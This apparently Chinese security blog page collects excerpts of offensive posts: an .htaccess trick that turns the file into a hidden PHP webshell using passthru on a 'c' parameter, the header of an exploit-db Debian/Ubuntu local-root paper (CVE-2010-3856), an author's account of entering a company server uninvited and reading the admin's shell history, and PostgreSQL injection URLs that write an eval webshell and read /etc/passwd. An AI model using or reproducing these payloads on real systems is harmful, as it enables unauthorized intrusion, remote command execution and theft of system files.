作者:kindle
From:http://key0.cn/?p=285
万恶的引用功能,下文复制粘贴无用,请自行将双引号修改
.htaccess内容如下
#首先允许web访问这个文件
<Files ~ “^\.ht”>
Order allow,deny
Allow from all
</Files>RedirectMatch 403 .htaccess$
#.htaccess结尾的403错误,这里是为了增加隐蔽性AddType application/x-httpd-php .htaccess
#给.htaccess映射php拓展### SHELL ### <?php echo “\n”;passthru($_GET['c'].” 2>&1″); ?>### KINDLE ###
#恶意的php代码
使用方法:http://localhost/.htaccess/?c=dir
Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
from:http://www.exploit-db.com/papers/15311/
# Exploit Title: Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
# Date: 24-10-2010
# Author: jmit
# Mail: fhausberger[at]gmail[dot]com
# Tested on: Debian 5.0.6
# CVE: CVE-2010-3856
————–
| DISCLAIMER |
————–
# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE. 阅读全文…
这是一个大公司的管理员,但是一个不合格的管理员。
有一天我不小心又进去看了下,好奇管理员如何处理被入侵的服务器,就看了下管理员的.bash_history文件。
ls
cp unerrata_en.php unerrata_ch.php
cd ..
ls
cd yum/
ls
diff yum_en.php yum_ch.php
cd ..
ls
ls -ll
chown apache.apache common_ch.inc.php
阅读全文…
来源:http://hi.baidu.com/p3rlish/blog/item/f3f96d1f71b97cfee0fe0bd7.html
转自:影子牛
如何获得webshell
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
如何读文件
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
http://127.0.0.1/postgresql.php?id=1;select * from myfile;